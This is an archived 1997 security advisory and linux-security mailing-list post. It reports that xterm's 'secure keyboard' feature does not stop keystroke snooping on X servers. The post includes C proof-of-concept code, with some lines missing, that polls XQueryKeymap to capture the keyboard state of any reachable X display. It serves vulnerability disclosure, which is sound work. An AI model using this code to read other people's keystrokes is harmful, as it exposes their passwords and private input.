xsecurekeyboard problem

Description:Many people think that by clicking "secure keyboard" on their xterm, they are safe froom snoopers. This is not always true, as Christopher Creutzig demonstrates by making 100 connect attempts per second
Author:Christopher Creutzig <christopher@nescio.foebud.org>
Compromise:read someone's keystrokes if you can connect to their Xserver, even if they are using the "secure keyboard" feature
Vulnerable Systems:XFree86, probably other implementations
Date:6 October 1997

Date: Mon, 6 Oct 1997 21:55:27 +0100 (MET)
From: Christopher Creutzig <christopher@nescio.foebud.org>
To: linux-security@redhat.com
Subject: [linux-security] xterm "secure console" insecure

    [The following text is in the "ISO-8859-1" character set]
    [Your display is set for the "US-ASCII" character set]
    [Some characters may be displayed incorrectly]

Dear Rogier,

 some time ago I laid claim that xterm's "secure console" feature was by no
means secure. You asked me to demonstrate this to you before you were to
forward my message to linux-security. Please find enclosed the program I use
as proof-of-concept.

Dear readers,

 please find enclosed a program illustrating a problem with xterm "secure
keyboard" and other programs claiming some method of allowing you to type in
passwords etc. securely even though untrusted applications have access to
your X server. Personally, I had heard about this problem some time ago, but
a message of mine stating this problem in a different discussions had not
been approved to linux-security because "quite a number of people good at
security think it's sufficient to use 'secure keyboard'", so I wrote a small
demonstration program. (It's actually my first X program, so son't be
surprised if it looks very inexperienced.)

 What the program does is, it connects to the X display specified in the
environment variable DISPLAY and reads the keybord status 100 times per
second. Every time the keyboard status changes, it dumps the data returned
by XQueryKeymap to its output. It does not try to figure out the actual keys
depressed, but then it's only supposed to be proof-of-concept. It works for
me on RedHat 4.0, but as far as I know, nothing has been changed with regard
to this problem in more recent versions of XFree86. I have not verified the
presence of this problem on other machines yet.

  Read everything typed on an X terminal you're allowed to connect to.
  Copyright (C) 1997 Christopher Creutzig

#include <X11/Xlib.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/time.h>
#include <sys/types.h>
#include <unistd.h>

int main(int argc, char **argv) {
	Display *disp;
	int i, changed;
	char *s;
	struct timeval shorttime;
	char keys[32];
	char lastkeys[32];
	shorttime.tv_sec = 0;
	shorttime.tv_usec = 10;
	s = getenv("DISPLAY");
	disp = XOpenDisplay(s);
	if (NULL==disp) {
		fprintf(stderr, "%s: can't open display %s\n", argv[0], s);

	for(i=0; i<32; i++) {
		keys[i] = 0;
		lastkeys[i] = 1;

	while(1) {
		select(0, NULL, NULL, NULL, &shorttime);
		XQueryKeymap(disp, keys);
		changed = 0;
		for(i=0; i<32; i++) {
			if (keys[i] != lastkeys[i])
				changed = 1;
			lastkeys[i] = keys[i];
		if (changed) {
			printf("Keyboard status:\n ");
			for (i=0; i<32; i++)
				printf("%02x ", (unsigned char)keys[i]);


	return 0;

 (Yes I know it never reaches XCloseDisplay, I just think it looks cleaner
this way... :-))

Christopher Creutzig # Im Samtfelde 19 # D-33098 Paderborn # V+49-5251-71873
  # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
   Für Wichtiges: Zur Zeit lese ich Mail an 'ccr@mupad.de' deutlich öfter.

Please refere to the information about this list as well as general
information about Linux security at http://www.aoy.com/Linux/Security.

To unsubscribe: mail -s unsubscribe test-list-request@redhat.com < /dev/null

More Exploits!

The master index of all exploits is available here (Very large file)
Or you can pick your favorite operating system:
All OS's Linux Solaris/SunOS Micro$oft
*BSD Macintosh AIX IRIX
ULTRIX/Digital UNIX HP/UX SCO Remote exploits

This page is part of Fyodor's exploit world. For a free program to automate scanning your network for vulnerable hosts and services, check out my network mapping tool, nmap. Or try these Insecure.Org resources: